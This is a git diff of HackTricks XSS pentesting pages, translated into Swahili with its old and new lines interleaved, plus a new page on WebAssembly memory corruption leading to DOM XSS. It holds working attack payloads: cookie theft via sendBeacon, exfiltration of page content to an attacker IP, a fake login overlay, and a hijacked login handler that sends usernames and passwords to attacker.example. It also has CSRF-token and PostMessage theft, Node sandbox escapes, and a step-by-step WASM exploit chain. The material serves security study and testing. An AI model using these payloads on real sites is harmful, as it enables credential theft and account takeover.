import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))
```
- Kufikia `require` kwa njia isiyo ya moja kwa moja
- Kupata `require` kwa njia isiyo ya moja kwa moja
[Kulingana na hii](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) modules hufunikwa na Node.js ndani ya function, kama ifuatavyo:
[Kulingana na hii](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) moduli zimefungwa na Node.js ndani ya function, kama ifuatavyo:
```javascript
;(function (exports, require, module, __filename, __dirname) {
// our actual module code
})
```
Kwa hivyo, ikiwa kutoka kwenye module hiyo tunaweza **kuitisha function nyingine**, inawezekana kutumia `arguments.callee.caller.arguments[1]` kutoka kwenye function hiyo kupata **`require`**:
Hivyo, ikiwa kutoka module hiyo tunaweza **call another function**, inawezekana kutumia `arguments.callee.caller.arguments[1]` kutoka function hiyo kufikia **`require`**:
```javascript
;(function () {
return arguments.callee.caller.arguments[1]("fs").readFileSync(
@ -1053,7 +1061,7 @@ return arguments.callee.caller.arguments[1]("fs").readFileSync(
)
})()
```
Kwa njia inayofanana na mfano uliopita, inawezekana **use error handlers** kufikia **wrapper** ya module na kupata **`require`** function:
Kwa njia sawa na mfano uliopita, inawezekana **use error handlers** kufikia **wrapper** ya module na kupata **`require`** function:
```javascript
try {
null.f()
@ -1093,12 +1101,12 @@ trigger()
```
### Obfuscation & Advanced Bypass
- **Obfuscations tofauti katika ukurasa mmoja:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
- **Different obfuscations kwenye ukurasa mmoja:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
- [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
- [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
- [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/)
- [http://www.jsfuck.com/](http://www.jsfuck.com)
- Mbinu za JSFuck zilizo ngumu zaidi: [https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
- JSFuck ya hali ya juu zaidi: [https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
- [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
- [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
- [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
@ -1274,7 +1282,7 @@ o゚ー゚o = (゚ω゚ノ + "_")[c ^ _ ^ o]
```
## XSS payloads za kawaida
### Payloads kadhaa katika 1
### Payloads kadhaa ndani ya 1
{{#ref}}
@ -1283,7 +1291,7 @@ steal-info-js.md
### Iframe Trap
Lazimisha mtumiaji avinjari kwenye ukurasa bila kutoka katika iframe na uibe vitendo vyake (ikiwa ni pamoja na taarifa zilizotumwa kwenye fomu):
Mfanye mtumiaji avinjari kwenye ukurasa bila kutoka kwenye iframe na uibe vitendo vyake (ikijumuisha taarifa zilizotumwa kwenye fomu):
{{#ref}}
@ -1313,9 +1321,9 @@ Lazimisha mtumiaji avinjari kwenye ukurasa bila kutoka katika iframe na uibe vit
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
```
> [!TIP]
> Hutaweza **kufikia cookies kutoka JavaScript** ikiwa bendera ya HTTPOnly imewekwa kwenye cookie. Lakini hapa kuna [njia kadhaa za kuzunguka ulinzi huu](../hacking-with-cookies/index.html#httponly) ikiwa utakuwa na bahati.
> Hutaweza **kupata cookies kutoka kwa JavaScript** ikiwa flag ya HTTPOnly imewekwa kwenye cookie. Lakini hapa una [njia kadhaa za kuipita ulinzi huu](../hacking-with-cookies/index.html#httponly) ikiwa una bahati.
### Kuiba Yaliyomo ya Ukurasa
### Kunyakua Maudhui ya Ukurasa
```javascript
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
var attacker = "http://10.10.14.8/exfil"
@ -1328,7 +1336,7 @@ fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
xhr.open("GET", url, true)
xhr.send(null)
```
### Pata anwani za IP za ndani
### Tafuta IPs za ndani
```html
<script>
var q = []
@ -1404,11 +1412,11 @@ console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms")
};
}
```
_Nyakati fupi zinaonyesha bandari inayojibu_ _Nyakati ndefu zinaonyesha hakuna jibu._
_Nyakati fupi zinaonyesha port inayojibu_ _Nyakati ndefu zinaonyesha hakuna jibu._
Kagua orodha ya bandari zilizozuiwa katika Chrome [**here**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) na katika Firefox [**here**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
Pitia orodha ya ports zilizozuiwa katika Chrome [**here**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) na katika Firefox [**here**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
### Sanduku la kuomba maelezo ya kuingia
### Sanduku la kuomba credentials
```html
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
```
@ -1427,7 +1435,7 @@ When any data is introduced in the password field, the username and password is
### Hijack form handlers to exfiltrate credentials (const shadowing)
Ikiwa handler muhimu (mfano, `function DoLogin(){...}`) inatangazwa baadaye kwenye ukurasa, na payload yako inaendesha mapema (mfano, via an inline JS-in-JS sink), fafanua `const` yenye jina sawa kwanza ili kuzuia na kufunga handler. Taarifa za function zinazotangazwa baadaye haziwezi rebind jina la `const`, zikiacha hook yako ikiwa ndani ya udhibiti:
Iwapo handler muhimu (mfano, `function DoLogin(){...}`) itatangazwa baadaye kwenye ukurasa, na payload yako ikafanya kazi mapema (mfano, via an inline JS-in-JS sink), tengeneza `const` yenye jina lile kwanza ili kuchukua nafasi na kufunga handler. Matangazo ya function baadaye hayawezi rebind jina la `const`, na hivyo kuiacha hook yako ikidhibiti:
```javascript
const DoLogin = () => {
const pwd = Trim(FormInput.InputPassword.value);
@ -1435,19 +1443,19 @@ const user = Trim(FormInput.InputUtente.value);
fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));
};
```
Vidokezo
Notes
- Hii inategemea mpangilio wa utekelezaji: injection yako lazima itekelezwe kabla ya tamko halali.
- Ikiwa payload yako imefungwa ndani ya `eval(...)`, bindings za `const/let` hazitakuwa globals. Tumia dynamic `<script>` injection technique kutoka sehemu “Deliverable payloads with eval(atob()) and scope nuances” ili kuhakikisha binding halisi, ya global na isiyoweza kurebind.
- Wakati vichujio vya maneno muhimu vinazuia code, changanya na Unicode-escaped identifiers au utoaji kwa `eval(atob('...'))`, kama ilivyoonyeshwa hapo juu.
- Iwapo payload yako imefungwa ndani ya `eval(...)`, vifungo vya `const/let` havitakuwa globals. Tumia mbinu ya dinamik `<script>` injection kutoka katika sehemu “Deliverable payloads with eval(atob()) and scope nuances” ili kuhakikisha true global, non-rebindable binding.
- Wakati vichujio vya maneno muhimu vinazuia msimbo, changanya na Unicode-escaped identifiers au `eval(atob('...'))` delivery, kama ilivyoonyeshwa hapo juu.
### Keylogger
Nilipotafuta tu kwenye github nilipata kadhaa tofauti:
Just searching in github I found a few different ones:
- [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
- [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
- [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
- Unaweza pia kutumia metasploit `http_javascript_keylogger`
- You can also use metasploit `http_javascript_keylogger`
### Stealing CSRF tokens
```javascript
@ -1464,7 +1472,7 @@ changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```
### Kuuibia ujumbe za PostMessage
### Kuiba ujumbe za PostMessage
```html
<img src="https://attacker.com/?" id=message>
<script>
@ -1479,7 +1487,7 @@ document.getElementById("message").src += "&"+e.data;
abusing-service-workers.md
{{#endref}}
### Kupata Shadow DOM
### Kufikia Shadow DOM
{{#ref}}
@ -1562,7 +1570,7 @@ javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4Ln
```
### Regex - Kufikia Maudhui Yaliyofichwa
Kutoka kwenye [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) inawezekana kujifunza kwamba hata kama baadhi ya thamani zinapofutika kwenye JS, bado inawezekana kuzipata katika JS attributes ndani ya objects mbalimbali. Kwa mfano, input ya REGEX bado inawezekana kuipata hata baada ya thamani ya input ya regex kuondolewa:
Kutoka kwa [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) inawezekana kujifunza kwamba hata kama baadhi ya values zinafifia kutoka JS, bado inawezekana kuziona kwenye JS attributes katika objects tofauti. Kwa mfano, input ya REGEX bado inaweza kupatikana hata baada value ya input ya regex kuondolewa:
```javascript
// Do regex with flag
flag = "CTF{FLAG}"
@ -1586,52 +1594,52 @@ document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt
{{#endref}}
## XSS ikitumia udhaifu nyingine
## XSS Kutumia udhaifu mwingine
### XSS katika Markdown
Je, unaweza kuingiza code ya Markdown ambayo itarenderiwa? Labda unaweza kupata XSS! Angalia:
Je, unaweza inject code za Markdown zitakazoonyeshwa na renderer? Labda unaweza kupata XSS! Angalia:
{{#ref}}
xss-in-markdown.md
{{#endref}}
### XSS kwa SSRF
### XSS hadi SSRF
Umepata XSS kwenye **tovuti inayotumia caching**? Jaribu **kuibadilisha kuwa SSRF** kwa kutumia Edge Side Include Injection na payload hii:
Umepata XSS kwenye **site inayotumia caching**? Jaribu **kuiboresha hadi SSRF** kupitia Edge Side Include Injection kwa payload hii:
```python
<esi:include src="http://yoursite.com/capture" />
```
Tumia hii kupitisha vikwazo vya cookie, vichujio vya XSS na mengi zaidi!\
Use it to bypass cookie restrictions, XSS filters and much more!\
Taarifa zaidi kuhusu mbinu hii hapa: [**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md).
### XSS katika PDF zinazoundwa kwa njia dinamiki
### XSS katika PDF zinazotengenezwa kwa wakati wa utekelezaji
Iwapo ukurasa wa wavuti unaunda PDF kwa kutumia input inayodhibitiwa na mtumiaji, unaweza kujaribu **kudanganya bot** inayounda PDF ili ianze **kutekeleza msimbo wowote wa JS**.\
Hivyo, ikiwa **bot ya muundaji wa PDF inakuta** aina fulani ya **HTML** **tags**, itayatafsiri, na unaweza **kutumia** tabia hii kusababisha **Server XSS**.
Ikiwa ukurasa wa wavuti unaunda PDF kwa kutumia input inayodhibitiwa na mtumiaji, unaweza kujaribu **trick the bot** anayetengeneza PDF ili **executing arbitrary JS code**.\
Hivyo, ikiwa **PDF creator bot finds** aina fulani ya **HTML** **tags**, itayatafsiri, na unaweza **abuse** tabia hii kusababisha **Server XSS**.
{{#ref}}
server-side-xss-dynamic-pdf.md
{{#endref}}
Ikiwa huwezi kuingiza HTML tags inaweza kuwa vyema kujaribu **kuingiza data za PDF**:
Ikiwa huwezi **inject HTML tags** inaweza kuwa vyema kujaribu **inject PDF data**:
{{#ref}}
pdf-injection.md
{{#endref}}
### XSS in Amp4Email
### XSS katika Amp4Email
AMP, iliyolenga kuharakisha utendaji wa kurasa za wavuti kwenye vifaa vya rununu, inajumuisha HTML tags zilizoambatanishwa na JavaScript ili kuhakikisha utendakazi huku ikisisitiza kasi na usalama. Inaunga mkono safu ya components kwa vipengele mbalimbali, vinavyopatikana kupitia [AMP components](https://amp.dev/documentation/components/?format=websites).
AMP, inayolenga kuharakisha utendaji wa kurasa za wavuti kwenye vifaa vya rununu, inaunganisha **HTML tags** zilizoambatanishwa na JavaScript ili kuhakikisha utendakazi kwa msisitizo wa kasi na usalama. Inasaidia aina mbalimbali za components kwa vipengele tofauti, vinavyopatikana kupitia [AMP components](https://amp.dev/documentation/components/?format=websites).
The [**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) format extends specific AMP components to emails, enabling recipients to interact with content directly within their emails.
Muundo wa [**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) unapanua components maalum za AMP kwa emails, ukiruhusu wapokeaji kuingiliana na yaliyomo moja kwa moja ndani ya emails zao.
Example [**writeup XSS in Amp4Email in Gmail**](https://adico.me/post/xss-in-gmail-s-amp4email).
Mfano [**writeup XSS in Amp4Email in Gmail**](https://adico.me/post/xss-in-gmail-s-amp4email).
### XSS uploading files (svg)
### XSS wakati wa kupakia faili (svg)
Pakia kama picha faili kama ifuatayo (kutoka [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
```html
@ -1707,7 +1715,7 @@ other-js-tricks.md
- [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
- [https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide](https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide)
## Marejeo
## Marejeleo
- [From "Low-Impact" RXSS to Credential Stealer: A JS-in-JS Walkthrough](https://r3verii.github.io/bugbounty/2025/08/25/rxss-credential-stealer.html)
- [MDN eval()](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval)

133
src/pentesting-web/xss-cross-site-scripting/wasm-linear-memory-template-overwrite-xss.md Normal file
View File

@ -0,0 +1,133 @@
# WebAssembly linear memory corruption to DOM XSS (template overwrite)
{{#include ../../banners/hacktricks-training.md}}
Mbinu hii inaonyesha jinsi bug ya memory-corruption ndani ya module ya WebAssembly (WASM) iliyotengenezwa na Emscripten inaweza kugeuzwa kuwa DOM XSS thabiti hata wakati input ime-sanitized. Pivot ni kuchafua writable constants katika WASM linear memory (mfano, HTML format templates) badala ya kushambulia string ya chanzo iliyosanitishwa.
Wazo kuu: Katika modeli ya WebAssembly, code inaishi katika pages zinazotekelezwa zisizoandikika, lakini data ya module (heap/stack/globals/"constants") inaishi katika single flat linear memory (pages za 64KB) ambayo module inaweza kuandika. Ikiwa C/C++ buggy inauandika nje ya mipaka, unaweza kufuta objects jirani na hata constant strings zilizowekwa ndani ya linear memory. Wakati constant kama hiyo inatumiwa baadaye kujenga HTML kwa ajili ya kuwekwa kupitia DOM sink, unaweza kugeuza sanitized input kuwa executable JavaScript.
Mfano wa tishio na masharti ya awali
- Web app inatumia Emscripten glue (Module.cwrap) kupiga simu ndani ya module ya WASM.
- Hali ya application inaishi katika WASM linear memory (mfano, C structs zenye pointers/lengths kwa buffers za watumiaji).
- Input sanitizer inakodisha metacharacters kabla ya uhifadhi, lakini uchoraji wa baadaye unajenga HTML kwa kutumia format string iliyohifadhiwa katika WASM linear memory.
- Kuna linear-memory corruption primitive (mfano, heap overflow, UAF, au unchecked memcpy).
Mfano mdogo wa muundo wa data unao hatari (mfano)
```c
typedef struct msg {
char *msg_data; // pointer to message bytes
size_t msg_data_len; // length after sanitization
int msg_time; // timestamp
int msg_status; // flags
} msg;
typedef struct stuff {
msg *mess; // dynamic array of msg
size_t size; // used
size_t capacity; // allocated
} stuff; // global chat state in linear memory
```
Mfumo wa mantiki wenye udhaifu
- addMsg(): inatenga buffer mpya yenye ukubwa unaolingana na input iliyosafishwa na inaongeza msg kwenye s.mess, ikizidisha uwezo kwa realloc inapohitajika.
- editMsg(): inasafisha upya na memcpy hupakia bytes mpya kwenye buffer iliyopo bila kuhakikisha urefu mpya ≤ ugawaji wa zamani → intralinearmemory heap overflow.
- populateMsgHTML(): inafomati maandishi yaliyosafishwa kwa stub yaliyowekwa kama "<article><p>%.*s</p></article>" iliyoko kwenye linear memory. HTML inayorudishwa inaingia kwenye DOM sink (mf., innerHTML).
Allocator grooming with realloc()
```c
int add_msg_to_stuff(stuff *s, msg new_msg) {
if (s->size >= s->capacity) {
s->capacity *= 2;
s->mess = (msg *)realloc(s->mess, s->capacity * sizeof(msg));
if (s->mess == NULL) exit(1);
}
s->mess[s->size++] = new_msg;
return s->size - 1;
}
```
- Tuma ujumbe wa kutosha ili kuzidi uwezo wa mwanzo. Baada ya ukuaji, realloc() mara nyingi huweka s->mess mara moja baada ya buffer ya mwisho ya mtumiaji katika linear memory.
- Kupitisha (overflow) ujumbe wa mwisho kupitia editMsg() ili kuharibu (clobber) nyanja ndani ya s->mess (mfano, kuandika upya msg_data pointers) → uandishi wa pointer wowote ndani ya linear memory kwa data itakayochorwa baadaye.
Exploit pivot: overwrite the HTML template (sink) instead of the sanitized source
- Usafishaji (sanitization) inalinda input, si sinks. Tafuta format stub inayotumika na populateMsgHTML(), kwa mfano:
- "<article><p>%.*s</p></article>" → change to "<img src=1 onerror=%.*s>"
- Tafuta stub hiyo kwa njia ya deterministi kwa kuchanganua linear memory; ni mfuatano wa byte wa kawaida ndani ya Module.HEAPU8.
- Baada ya kuandika upya stub, yaliyomo ya ujumbe yaliyosafishwa yanageuka kuwa JavaScript handler kwa onerror, hivyo kuongeza ujumbe mpya wenye maandishi kama alert(1337) kutatoa <img src=1 onerror=alert(1337)> na kutekeleza mara moja katika DOM.
Chrome DevTools workflow (Emscripten glue)
- Simamisha kwenye wito wa kwanza wa Module.cwrap katika JS glue na ingia ndani ya tovuti ya wito ya wasm ili kunasa pointer arguments (numeric offsets into linear memory).
- Tumia typed views kama Module.HEAPU8 kusoma/kuandika WASM memory kutoka console.
- Vipande vya msaada:
```javascript
function writeBytes(ptr, byteArray){
if(!Array.isArray(byteArray)) throw new Error("byteArray must be an array of numbers");
for(let i=0;i<byteArray.length;i++){
const byte = byteArray[i];
if(typeof byte!=="number"||byte<0||byte>255) throw new Error(`Invalid byte at index ${i}: ${byte}`);
HEAPU8[ptr+i]=byte;
}
}
function readBytes(ptr,len){ return Array.from(HEAPU8.subarray(ptr,ptr+len)); }
function readBytesAsChars(ptr,len){
const bytes=HEAPU8.subarray(ptr,ptr+len);
return Array.from(bytes).map(b=>(b>=32&&b<=126)?String.fromCharCode(b):'.').join('');
}
function searchWasmMemory(str){
const mem=Module.HEAPU8, pat=new TextEncoder().encode(str);
for(let i=0;i<mem.length-pat.length;i++){
let ok=true; for(let j=0;j<pat.length;j++){ if(mem[i+j]!==pat[j]){ ok=false; break; } }
if(ok) console.log(`Found "${str}" at memory address:`, i);
}
console.log(`"${str}" not found in memory`);
return -1;
}
const a = bytes => bytes.reduce((acc, b, i) => acc + (b << (8*i)), 0); // little-endian bytes -> int
```
End-to-end exploitation recipe
1) Groom: Ongeza N small messages ili kusababisha realloc(). Hakikisha s->mess iko kando ya user buffer.
2) Overflow: call editMsg() on the last message with a longer payload to overwrite an entry in s->mess, setting msg_data of message 0 to point at (stub_addr + 1). The +1 inaruka '<' ya mwanzoni ili kuhifadhi tag alignment wakati wa uhariri ujao.
3) Template rewrite: Hariri message 0 ili bytes zake ziandike juu ya template na: "img src=1 onerror=%.*s ".
4) Trigger XSS: Ongeza ujumbe mpya ambao yaliyomo yamesafishwa na ni JavaScript, kwa mfano, alert(1337). Inapo-render, inatoa <img src=1 onerror=alert(1337)> na kuitekeleza.
Example action list to serialize and place in ?s= (Base64-encode with btoa before use)
```json
[
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"edit","msgId":10,"content":"aaaaaaaaaaaaaaaa.\u0000\u0001\u0000\u0050","time":1756885686080},
{"action":"edit","msgId":0,"content":"img src=1 onerror=%.*s ","time":1756885686080},
{"action":"add","content":"alert(1337)","time":1756840476392}
]
```
Kwa nini bypass hii inafanya kazi
- WASM prevents code execution from linear memory, but constant data inside linear memory is writable if program logic is buggy.
- The sanitizer only protects the source string; by corrupting the sink (the HTML template), sanitized input becomes the JS handler value and executes when inserted into the DOM.
- realloc()-driven adjacency plus unchecked memcpy in edit flows enables pointer corruption to redirect writes to attacker-chosen addresses within linear memory.
Ujumla na nyanja nyingine za mashambulizi
- Any in-memory HTML template, JSON skeleton, or URL pattern embedded in linear memory can be targeted to change how sanitized data is interpreted downstream.
- Other common WASM pitfalls: out-of-bounds writes/reads in linear memory, UAF on heap objects, function-table misuse with unchecked indirect call indices, and JS↔WASM glue mismatches.
Mwongozo wa ulinzi
- In edit paths, verify new length ≤ capacity; resize buffers before copy (realloc to new_len) or use size-bounded APIs (snprintf/strlcpy) and track capacity.
- Keep immutable templates out of writable linear memory or integrity-check them before use.
- Treat JS↔WASM boundaries as untrusted: validate pointer ranges/lengths, fuzz exported interfaces, and cap memory growth.
- Sanitize at the sink: avoid building HTML in WASM; prefer safe DOM APIs over innerHTML-style templating.
- Avoid trusting URL-embedded state for privileged flows.
## Marejeleo
- [Pwning WebAssembly: Bypassing XSS Filters in the WASM Sandbox](https://zoozoo-sec.github.io/blogs/PwningWasm-BreakingXssFilters/)
- [V8: Wasm Compilation Pipeline](https://v8.dev/docs/wasm-compilation-pipeline)
- [V8: Liftoff (baseline compiler)](https://v8.dev/blog/liftoff)
- [Debugging WebAssembly in Chrome DevTools (YouTube)](https://www.youtube.com/watch?v=BTLLPnW4t5s&t)
- [SSD: Intro to Chrome exploitation (WASM edition)](https://ssd-disclosure.com/an-introduction-to-chrome-exploitation-webassembly-edition/)
{{#include ../../banners/hacktricks-training.md}}